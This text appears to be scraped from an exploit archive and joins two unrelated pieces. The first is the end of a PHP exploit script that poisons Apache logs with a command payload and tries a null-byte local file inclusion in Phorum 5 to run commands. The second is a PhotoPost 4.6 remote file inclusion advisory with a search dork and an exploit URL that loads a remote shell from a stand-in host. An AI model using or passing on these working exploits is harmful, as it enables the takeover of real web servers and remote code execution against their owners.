$packet.="User-Agent: ".$CODE."\r\n"; $packet.="Host: ".$host."\r\n"; $packet.="Connection: close\r\n\r\n"; #debug #echo quick_dump($packet); sendpacketii($packet); # fill with possible locations $paths= array ( " / / / / / / / / / /var/log/httpd/access_log", " / / / / / / / / / /var/log/httpd/error_log", " /apache/logs/error.log", " /apache/logs/access.log", " / /apache/logs/error.log", " / /apache/logs/access.log", " / / /apache/logs/error.log", " / / /apache/logs/access.log", " / / / /apache/logs/error.log", " / / / /apache/logs/access.log", " / / / / /apache/logs/error.log", " / / / / /apache/logs/access.log", " /logs/error.log", " /logs/access.log", " / /logs/error.log", " / /logs/access.log", " / / /logs/error.log", " / / /logs/access.log", " / / / /logs/error.log", " / / / /logs/access.log", " / / / / /logs/error.log", " / / / / /logs/access.log", " / / / / / / / / / /etc/httpd/logs/acces_log", " / / / / / / / / / /etc/httpd/logs/acces.log", " / / / / / / / / / /etc/httpd/logs/error_log", " / / / / / / / / / /etc/httpd/logs/error.log", " / / / / / / / / / /var/www/logs/access_log", " / / / / / / / / / /var/www/logs/access.log", " / / / / / / / / / /usr/local/apache/logs/access_log", " / / / / / / / / / /usr/local/apache/logs/access.log", " / / / / / / / / / /var/log/apache/access_log", " / / / / / / / / / /var/log/apache/access.log", " / / / / / / / / / /var/log/access_log", " / / / / / / / / / /var/www/logs/error_log", " / / / / / / / / / /var/www/logs/error.log", " / / / / / / / / / /usr/local/apache/logs/error_log", " / / / / / / / / / /usr/local/apache/logs/error.log", " / / / / / / / / / /var/log/apache/error_log", " / / / / / / / / / /var/log/apache/error.log", " / / / / / / / / / /var/log/access_log", " / / / / / / / / / /var/log/error_log" ); for ($i=0; $i<=count($paths)-1; $i++) { $a=$i+3; echo "[".$a."] trying with $paths[$i]%00 for template argument\r\n"; $packet="GET ".$p."pm.php?1,page=1&GLOBALS[template]=".urlencode($paths[$i])."%00 HTTP/1.0\r\n"; $packet.="Host: ".$host."\r\n"; $packet.="Cookie: ".$cookie." cmd=".$cmd.";\r\n"; $packet.="Connection: Close\r\n\r\n"; sendpacketii($packet); if (strstr($html,"phorum_xpl")) { echo "exploit succeeded \n\n"; $temp=explode("phorum_xpl",$html); echo $temp[1]; die; } } //if you are here echo "exploit failed "; ?> original url: http://retrogod.altervista.org/phorum5_local_incl_xpl.html vns3curity(HCE) #PhotoPost => 4.6 (PP_PATH) Remote File Inclusion Exploit #================================================= =================== #PhotoPost => 4.6 (PP_PATH) Remote File Inclusion Exploit #================================================= =================== # #Critical Level : Dangerous # #By Saudi Hackrz # #http://www.popphoto.com/ # #================================================= ================ # #Script Name: PhotoPost 4.6 & 4.5 & 4.x 4.0 #Fix : update To 4.7 or 4.8 #Script #http://www.9q9q.net/up3/index.php?f=UyTfHCHIg # #================================================= ================ #Bug in : zipndownload.php # require "$PP_PATH/languages/$pplang/showgallery.php"; # require "$PP_PATH/login-inc.php"; # #in <<<< zipndownload.php & #Dork :in Yahoo : "Powered by: PhotoPost PHP 4.6" or "Powered by: PhotoPost PHP 4.5" #================================================= ================ # #Exploit : # # #http://site.com/[path]/zipndownload.php?PP_PATH=http://SHELLURL.COM? # #=================================I LOVE SAUDI ARABIA============================================ = #Discoverd By : Saudi Hackrz # #Conatact : Saudi.unix[at]hotmail.com # #GreetZ :SnIpEr_Sa , King18 , LeCoPrA And All My Frind #www.S3hr.com , http://www.elite-team.cc/vb , www.3asfh.net ,www.xp10.com